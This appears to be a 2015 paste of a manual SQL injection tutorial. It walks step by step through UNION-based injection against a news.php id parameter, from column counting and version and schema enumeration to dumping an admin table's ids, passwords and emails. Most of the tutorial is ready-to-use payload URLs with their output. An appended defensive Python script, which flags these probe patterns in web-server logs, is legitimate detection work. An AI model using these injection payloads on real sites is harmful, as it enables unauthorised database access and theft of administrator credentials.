Kyfx

Sqli Injecting Manually :)

Nov 28th, 2015
Injecting a site

Now you have your vulnerable site:
http://www.site.com/news.php?id=-17'   (add ' to the end to check if it's vulnerable)
It gets an error, so I know it's vulnerable. I remove the ' and do
http://www.site.com/news.php?id=17 order by 1--
http://www.site.com/news.php?id=17 order by 2--
http://www.site.com/news.php?id=17 order by 3--
No errors, so I continue, etc. etc.
I finally get an error when I do the one below:
http://www.site.com/news.php?id=17 order by 13--
So this tells me a 13th column doesn't exist, so there must be 12 columns in the query.
Next I do the UNION SELECT as shown below:
http://www.site.com/news.php?id=-17 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12-- (note: make sure to add a - after the = in the ID, like =-17)
I hit enter.
Numbers 4 and 5 appear on the page; this means data can be extracted through columns four and five.
I replace 4 in the URL with @@version so it now looks like
http://www.site.com/news.php?id=-17 UNION SELECT 1,2,3,@@version,5,6,7,8,9,10,11,12--
Then I hit enter and see
5.0.32-Debian_7etch8-log
^ this is the MySQL version running. It's running version 5, which helps a lot (on versions 4 and below we have to guess the table names).

Now, where we put @@version (4th spot), replace it with
group_concat(table_name)   << gets the table names
like
http://www.site.com/news.php?id=-17 UNION SELECT 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12--
And at the end of the UNION SELECT string remove the -- after the 12 and add
+from+information_schema.tables+where+table_schema=database()--
So it now looks like
http://www.site.com/news.php?id=-17 UNION SELECT 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12 +from+information_schema.tables+where+table_schema=database()--
I now see
x_admins,x_articles,x_ban,x_banners,x_banners_info,x_comments,x_file_categories,x_file_data,x_forum_a,x_forum_b,x_forum_c,x_gbook,x_infopages,x_links_categories,x_links_data,x_mails,x_menu,x_news,x_poll_data,x_poll_desc,x_pw,x_topic,x_users
Now replace group_concat(table_name) with group_concat(column_name), and everything after 5,6,7,8,9,10,11,12 with
+from+information_schema.columns+where+table_name='x_admins'--
so it goes from
http://www.site.com/news.php?id=-17 UNION SELECT 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12 +from+information_schema.tables+where+table_schema=database()--
TO
http://www.site.com/news.php?id=-17 UNION SELECT 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12 +from+information_schema.columns+where+table_name='x_admins'--
We see id,nick,pass,name,added,access,mail,stat
It is worth learning how group_concat works at this point, but for now we put
group_concat(id,0x3a,pass,0x3a,mail) where group_concat(column_name) was, and add +from+x_admins-- after 10,11,12
So the string becomes
http://www.site.com/news.php?id=-17 UNION SELECT 1,2,3,group_concat(id,0x3a,pass,0x3a,mail),5,6,7,8,9,10,11,12 +from+x_admins--
At this point we obtain the admin's password.
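As an added example from the defending side (not part of the original paste), here is a small Python detector that runs over web-server access-log lines and flags the probing sequence walked through above: the ORDER BY column counting, the UNION SELECT with numeric placeholders, the @@version check and the information_schema lookups. The log lines, IP addresses and paths are constructed samples, not real traffic.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit

# Indicators taken from the probing sequence this page walks through.
PATTERNS = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+\s*--", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I),
    "version_probe": re.compile(r"@@version\b", re.I),
    "group_concat": re.compile(r"\bgroup_concat\s*\(", re.I),
}
# Combined log format: ip ident user [time] "METHOD path proto" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def decode_query(path: str) -> str:
    """Decode the query string as the database would see it ('+' and %20 become spaces)."""
    return unquote_plus(urlsplit(path).query)

def classify(path: str) -> list:
    """Return the indicator names present in one request path."""
    q = decode_query(path)
    return [name for name, rx in PATTERNS.items() if rx.search(q)]

def scan_log(lines):
    """Return (ip, status, indicators) for each log line that carries an indicator."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _method, path, status = m.groups()
        found = classify(path)
        if found:
            hits.append((ip, int(status), found))
    return hits

def column_probers(hits, threshold=3):
    """IPs that issued at least `threshold` ORDER BY probes (the column-counting loop above)."""
    c = Counter(ip for ip, _s, found in hits if "order_by_probe" in found)
    return {ip for ip, n in c.items() if n >= threshold}

# Constructed sample lines mirroring the page's requests (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [28/Nov/2015:10:00:01 +0000] "GET /news.php?id=17 HTTP/1.1" 200 4096',
    '203.0.113.5 - - [28/Nov/2015:10:00:05 +0000] "GET /news.php?id=17%20order%20by%201-- HTTP/1.1" 200 4096',
    '203.0.113.5 - - [28/Nov/2015:10:00:06 +0000] "GET /news.php?id=17%20order%20by%202-- HTTP/1.1" 200 4096',
    '203.0.113.5 - - [28/Nov/2015:10:00:09 +0000] "GET /news.php?id=17%20order%20by%2013-- HTTP/1.1" 500 512',
    '203.0.113.5 - - [28/Nov/2015:10:00:20 +0000] "GET /news.php?id=-17%20UNION%20SELECT%201,2,3,@@version,5,6,7,8,9,10,11,12-- HTTP/1.1" 200 4120',
    '203.0.113.5 - - [28/Nov/2015:10:00:41 +0000] "GET /news.php?id=-17%20UNION%20SELECT%201,2,3,group_concat(table_name),5,6,7,8,9,10,11,12+from+information_schema.tables+where+table_schema=database()-- HTTP/1.1" 200 4300',
    '198.51.100.9 - - [28/Nov/2015:10:01:00 +0000] "GET /news.php?id=18 HTTP/1.1" 200 4010',
]
```

A server-side 500 on an ORDER BY probe followed by a 200 on a UNION SELECT from the same client is the telltale of a successful column count; the fix is still a parameterised query, the detector only tells you it is being looked for.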